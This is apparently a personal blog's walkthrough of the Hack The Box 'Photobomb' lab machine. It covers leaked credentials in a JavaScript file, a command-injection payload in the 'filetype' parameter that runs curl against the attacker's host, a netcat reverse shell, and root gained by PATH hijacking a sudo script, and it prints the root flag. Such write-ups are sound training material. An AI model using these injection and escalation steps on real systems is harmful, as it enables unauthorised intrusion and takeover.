Akshay's Blog
Akshay's Blog
Share

Photobomb Writeup

Posted on
Photobomb Writeup

Hackthebox Photobomb Writeup

## Add Domain to Hosts file. ***

Photobomb uses a domain name of photobomb.htb.

sudo vi /etc/hosts

and add

10.10.11.182  photobomb.htb

After visiting to the site, there is a login page present which is

http://photobomb.htb/printer

When reading the source code I found a photobomb.js file .

image

Suprisingly the photobomb.js file have login details of the site.

image

Login

I logged in using the url http://pH0t0:b0Mb!@photobomb.htb/printer

image

Capturing request using burpsuite.

These are the parameters sent to server. I checked all of them for command injection and found that filetype is vulnerable.

image
image

To verify that i used curl to send a request to my linux machine.

  1. First started a python server.

image
2) Sent the request in burp using payload

filetype=jpg;curl -XGET 10.10.14.105:8000

image

  1. Got request to my machine

image

so the command injection is comfirmed and we need to get a reverse shell now.

Reverse Shell

  1. Start a listener
    sudo netcat -lvnp 9001
    image

  2. Create a payload and url encode it. I used revshells.com to create a python reverse shell.

image
image

  1. Got reverse shell

image

User Flag

image

Root Flag

For the root flag we need to do privilege escalation.

  1. Check the sudo rights of user
$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
  1. Reading the /opt/cleanup.sh file
$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
  1. We can take advantage of the fact that we can change variables such as the path to take a custom find command, and under the context of sudo our find will be executed as root For this we will create a find file that is worth bash and we will give it execution permissions
$ echo bash > find
$ chmod +x find
  1. Now by changing the path variable we execute the script and get root 
$ sudo PATH=$PWD:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# ls
1  find  log  photobomb.sh  public  resized_images  server.rb  source_images
root@photobomb:/home/wizard/photobomb# cd /
root@photobomb:/# ls
bin   dev  home  lib32  libx32      media  opt   root  sbin  sys  usr
boot  etc  lib   lib64  lost+found  mnt    proc  run   srv   tmp  var
root@photobomb:/# cd root
root@photobomb:~# ls
root.txt
root@photobomb:~# cat root.txt
8380325b1ea2d19343bb97b83ab03359
root@photobomb:~#
Hack The BoxHackerOneAbout.me